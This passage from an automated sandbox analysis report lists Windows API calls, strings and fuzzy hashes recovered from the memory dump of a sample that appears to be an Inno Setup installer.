                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CountSleepTick
                                                    • String ID:
                                                    • API String ID: 2227064392-0
                                                    • Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                    • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                    • Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                    • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                    • String ID:
                                                    • API String ID: 215268677-0
                                                    • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                    • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                    • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                    • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                    APIs
                                                    • GetLastActivePopup.USER32(?), ref: 00424244
                                                    • IsWindowVisible.USER32(?), ref: 00424255
                                                    • IsWindowEnabled.USER32(?), ref: 0042425F
                                                    • SetForegroundWindow.USER32(?), ref: 00424269
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                    • String ID:
                                                    • API String ID: 2280970139-0
                                                    • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                    • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                    • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                    • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                    APIs
                                                    • GlobalHandle.KERNEL32 ref: 0040626F
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                    • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocHandleLockUnlock
                                                    • String ID:
                                                    • API String ID: 2167344118-0
                                                    • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                    • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                    • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                    • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                    APIs
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                    Strings
                                                    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                    • Failed to parse "reg" constant, xrefs: 00479E44
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                    • API String ID: 3535843008-1938159461
                                                    • Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                    • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                    • Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                    • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                    • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                    Strings
                                                    • Will not restart Windows automatically., xrefs: 00482CB2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveForeground
                                                    • String ID: Will not restart Windows automatically.
                                                    • API String ID: 307657957-4169339592
                                                    • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                    • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                    • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                    • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                    Strings
                                                    • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                    • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                    • API String ID: 0-1974262853
                                                    • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                    • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                    • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                    • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                    APIs
                                                      • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                    • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                    • %s\%s_is1, xrefs: 004789A4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen
                                                    • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                    • API String ID: 47109696-1598650737
                                                    • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                    • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                    • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                    • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                    APIs
                                                    • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ExecuteMessageSendShell
                                                    • String ID: open
                                                    • API String ID: 812272486-2758837156
                                                    • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                    • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                    • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                    • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                    APIs
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                    • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                      • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                    • String ID: <
                                                    • API String ID: 893404051-4251816714
                                                    • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                    • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                    • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                    • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                    APIs
                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021F7B18,000012C4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                    • String ID: )
                                                    • API String ID: 2227675388-1084416617
                                                    • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                    • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                    • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                    • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: /INITPROCWND=$%x $@
                                                    • API String ID: 2353593579-4169826103
                                                    • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                    • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                    • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                    • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                    APIs
                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                    • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: String$AllocByteCharFreeMultiWide
                                                    • String ID: NIL Interface Exception$Unknown Method
                                                    • API String ID: 3952431833-1023667238
                                                    • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                    • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                    • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                    • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                    APIs
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                    • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                      • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                    • String ID: <cI
                                                    • API String ID: 3798668922-2480932022
                                                    • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                    • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                    • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                    • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                    APIs
                                                    • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Value$EnumQuery
                                                    • String ID: Inno Setup: No Icons
                                                    • API String ID: 1576479698-2016326496
                                                    • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                    • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                    • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                    • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                    APIs
                                                      • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(6FB40000,00480FF3), ref: 0047C8C6
                                                      • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                      • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                    Strings
                                                    • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                    • String ID: Detected restart. Removing temporary directory.
                                                    • API String ID: 1717587489-3199836293
                                                    • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                    • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                    • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                    • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
